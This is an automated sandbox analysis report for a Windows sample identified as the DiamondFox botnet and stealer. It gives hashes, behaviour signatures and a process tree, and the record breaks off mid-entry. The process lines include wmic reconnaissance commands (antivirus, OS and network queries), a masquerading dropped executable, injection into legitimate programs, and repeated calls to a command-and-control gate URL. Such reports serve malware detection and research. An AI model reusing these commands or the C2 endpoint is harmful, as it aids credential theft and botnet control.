Overview

overview

10

Static

static

958d8e1498...c7.exe

windows7_x64

10

958d8e1498...c7.exe

windows10_x64

10

Analysis

  • max time kernel
    143s
  • max time network
    152s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    04/02/2021, 10:45

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    958d8e1498f1b3db2c79a62f78da66520654243f25acb19025874066b92618c7.exe

  • Size

    392KB

  • MD5

    58e3dd75dabaa2d6e81118b2f7ca854a

  • SHA1

    ccab657f017855ddf2e0ed0341f39f1036ce8523

  • SHA256

    958d8e1498f1b3db2c79a62f78da66520654243f25acb19025874066b92618c7

  • SHA512

    7fa5ff90c155e6370545d6226993411e2bbcca2e33f375fde72bea8437139c5f4e5c9fe4ccd18a5d5906817567b6153b1c5d4480e56a2b9d7263f5e1e657e13e

Score
10/10
diamondfoxbotnetdiscoveryransomwarespywarestealer

Malware Config

Signatures

  • DiamondFox

    DiamondFox is a multipurpose botnet with many capabilities.

    botnetstealerdiamondfox
  • DiamondFox payload 1 IoCs

    Detects DiamondFox payload in file/memory.

  • NirSoft MailPassView 3 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 3 IoCs

    Password recovery tool for various web browsers

  • Nirsoft 9 IoCs
  • Executes dropped EXE 14 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spyware
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • JavaScript code in executable 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

    ransomware
  • Suspicious use of SetThreadContext 16 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Program crash 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 36 IoCs
  • Suspicious use of AdjustPrivilegeToken 384 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 677 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\958d8e1498f1b3db2c79a62f78da66520654243f25acb19025874066b92618c7.exe
    "C:\Users\Admin\AppData\Local\Temp\958d8e1498f1b3db2c79a62f78da66520654243f25acb19025874066b92618c7.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3584
    • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
      "C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:3568
      • C:\Windows\SysWOW64\Wbem\wmic.exe
        "wmic" /Node:localhost /Namespace:\\root\SecurityCenter2 path AntiVirusProduct get DisplayName /FORMAT:List
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4028
      • C:\Windows\SysWOW64\Wbem\wmic.exe
        "wmic" os get caption /FORMAT:List
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3024
      • C:\Windows\SysWOW64\Wbem\wmic.exe
        "wmic" path win32_VideoController get caption /FORMAT:List
        3⤵
          PID:1584
        • C:\Windows\SysWOW64\Wbem\wmic.exe
          "wmic" path win32_NetworkAdapterConfiguration where IPEnabled=1 get IPAddress /FORMAT:List
          3⤵
            PID:1284
          • C:\Windows\SysWOW64\Wbem\wmic.exe
            "wmic" LogicalDisk Where DriveType=4 get VolumeName /FORMAT:List
            3⤵
              PID:416
            • C:\Windows\SysWOW64\Wbem\wmic.exe
              "wmic" path win32_PingStatus where address='rusacenwaxalvi.xyz' get StatusCode /FORMAT:List
              3⤵
                PID:2800
              • C:\Windows\SysWOW64\Wbem\wmic.exe
                "wmic" path win32_PingStatus where address='rusacenwaxalvi.xyz' get ResponseTime /FORMAT:List
                3⤵
                  PID:2216
                • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                  /scomma "C:\Users\Admin\AppData\Roaming\EdgeCP\1.log"
                  3⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2304
                • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                  /scomma "C:\Users\Admin\AppData\Roaming\EdgeCP\4.log"
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of SetWindowsHookEx
                  PID:2460
                • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                  /scomma "C:\Users\Admin\AppData\Roaming\EdgeCP\2.log"
                  3⤵
                  • Executes dropped EXE
                  PID:1596
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 1596 -s 88
                    4⤵
                    • Program crash
                    PID:3092
                • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                  /scomma "C:\Users\Admin\AppData\Roaming\EdgeCP\3.log"
                  3⤵
                  • Executes dropped EXE
                  PID:3504
                • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                  /VisitTimeFilterType 2 /VisitTimeFilterValue 6 /scomma "C:\Users\Admin\AppData\Roaming\EdgeCP\6.log"
                  3⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3900
                • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                  /scomma "C:\Users\Admin\AppData\Roaming\EdgeCP\5.log"
                  3⤵
                  • Executes dropped EXE
                  PID:3320
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 3320 -s 88
                    4⤵
                    • Program crash
                    PID:2248
                • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                  X http://rusacenwaxalvi.xyz/dimwebpan/gate.php*Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141*7052770e4931b3197e6e9a0bccc1d841
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  PID:420
                  • C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe
                    X C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                    4⤵
                      PID:496
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 496 -s 88
                        5⤵
                        • Program crash
                        PID:3392
                    • C:\Program Files (x86)\Google\Update\Install\{B130F566-BB8B-4B26-90AB-86F1BEB7B8E3}\86.0.4240.111_chrome_installer.exe
                      X C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                      4⤵
                      • Drops file in Program Files directory
                      PID:3868
                      • C:\Program Files (x86)\Google\Update\Install\{B130F566-BB8B-4B26-90AB-86F1BEB7B8E3}\CR_1FAF7.tmp\setup.exe
                        "C:\Program Files (x86)\Google\Update\Install\{B130F566-BB8B-4B26-90AB-86F1BEB7B8E3}\CR_1FAF7.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Google\Update\Install\{B130F566-BB8B-4B26-90AB-86F1BEB7B8E3}\CR_1FAF7.tmp\CHROME.PACKED.7Z" X C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                        5⤵
                        • Executes dropped EXE
                        PID:3820
                        • C:\Program Files (x86)\Google\Update\Install\{B130F566-BB8B-4B26-90AB-86F1BEB7B8E3}\CR_1FAF7.tmp\setup.exe
                          "C:\Program Files (x86)\Google\Update\Install\{B130F566-BB8B-4B26-90AB-86F1BEB7B8E3}\CR_1FAF7.tmp\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x250,0x254,0x258,0x22c,0x25c,0x7ff75ac57740,0x7ff75ac57750,0x7ff75ac57760
                          6⤵
                          • Executes dropped EXE
                          PID:976
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --force-first-run
                          6⤵
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of FindShellTrayWindow
                          PID:2792
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ffb8b4d6e00,0x7ffb8b4d6e10,0x7ffb8b4d6e20
                            7⤵
                              PID:2776
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1520 /prefetch:2
                              7⤵
                                PID:3452
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1764 /prefetch:8
                                7⤵
                                • Suspicious behavior: EnumeratesProcesses
                                PID:3824
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2760 /prefetch:1
                                7⤵
                                  PID:3720
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2748 /prefetch:1
                                  7⤵
                                    PID:3732
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1
                                    7⤵
                                      PID:3908
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3472 /prefetch:1
                                      7⤵
                                        PID:2788
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3664 /prefetch:1
                                        7⤵
                                          PID:3484
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3644 /prefetch:1
                                          7⤵
                                            PID:3380
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4224 /prefetch:8
                                            7⤵
                                              PID:4260
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4336 /prefetch:8
                                              7⤵
                                                PID:4976
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4256 /prefetch:8
                                                7⤵
                                                  PID:4420
                                                • C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe
                                                  "C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings
                                                  7⤵
                                                    PID:4436
                                                    • C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe
                                                      "C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6db7a7740,0x7ff6db7a7750,0x7ff6db7a7760
                                                      8⤵
                                                        PID:4524
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4928 /prefetch:8
                                                      7⤵
                                                        PID:4476
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4900 /prefetch:8
                                                        7⤵
                                                          PID:4536
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4004 /prefetch:8
                                                          7⤵
                                                            PID:4648
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5612 /prefetch:8
                                                            7⤵
                                                              PID:4660
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5272 /prefetch:8
                                                              7⤵
                                                                PID:4732
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4936 /prefetch:8
                                                                7⤵
                                                                  PID:4776
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5260 /prefetch:8
                                                                  7⤵
                                                                    PID:4816
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5236 /prefetch:8
                                                                    7⤵
                                                                      PID:4860
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5380 /prefetch:8
                                                                      7⤵
                                                                        PID:4268
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5048 /prefetch:8
                                                                        7⤵
                                                                          PID:4944
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5360 /prefetch:8
                                                                          7⤵
                                                                            PID:5008
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5904 /prefetch:8
                                                                            7⤵
                                                                              PID:5068
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5900 /prefetch:8
                                                                              7⤵
                                                                                PID:5108
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6184 /prefetch:8
                                                                                7⤵
                                                                                  PID:1472
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6172 /prefetch:8
                                                                                  7⤵
                                                                                    PID:4456
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6440 /prefetch:8
                                                                                    7⤵
                                                                                      PID:4516
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6704 /prefetch:8
                                                                                      7⤵
                                                                                        PID:4504
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6728 /prefetch:8
                                                                                        7⤵
                                                                                          PID:4656
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6660 /prefetch:8
                                                                                          7⤵
                                                                                            PID:4796
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4748 /prefetch:8
                                                                                            7⤵
                                                                                              PID:4924
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5556 /prefetch:8
                                                                                              7⤵
                                                                                                PID:5012
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7104 /prefetch:8
                                                                                                7⤵
                                                                                                  PID:5000
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5460 /prefetch:1
                                                                                                  7⤵
                                                                                                    PID:4948
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7316 /prefetch:8
                                                                                                    7⤵
                                                                                                      PID:4416
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7100 /prefetch:8
                                                                                                      7⤵
                                                                                                        PID:4492
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7576 /prefetch:8
                                                                                                        7⤵
                                                                                                          PID:3596
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7292 /prefetch:8
                                                                                                          7⤵
                                                                                                            PID:4480
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7696 /prefetch:8
                                                                                                            7⤵
                                                                                                              PID:4684
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7944 /prefetch:8
                                                                                                              7⤵
                                                                                                                PID:4364
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8108 /prefetch:8
                                                                                                                7⤵
                                                                                                                  PID:5096
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8404 /prefetch:8
                                                                                                                  7⤵
                                                                                                                    PID:1652
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8224 /prefetch:1
                                                                                                                    7⤵
                                                                                                                      PID:2512
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8644 /prefetch:8
                                                                                                                      7⤵
                                                                                                                        PID:4440
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1476,15792737218416472170,15957587791833439457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5516 /prefetch:8
                                                                                                                        7⤵
                                                                                                                          PID:1356
                                                                                                                  • C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
                                                                                                                    X C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                                                                                                                    4⤵
                                                                                                                      PID:1144
                                                                                                                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                      X C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                                                                                                                      4⤵
                                                                                                                        PID:3328
                                                                                                                      • C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe
                                                                                                                        X C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                                                                                                                        4⤵
                                                                                                                          PID:2896
                                                                                                                      • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                                                                                                                        X http://rusacenwaxalvi.xyz/dimwebpan/gate.php*Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141*7052770e4931b3197e6e9a0bccc1d841
                                                                                                                        3⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                        PID:2204
                                                                                                                      • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                                                                                                                        X http://rusacenwaxalvi.xyz/dimwebpan/gate.php*Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141*7052770e4931b3197e6e9a0bccc1d841
                                                                                                                        3⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                        PID:2924
                                                                                                                      • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
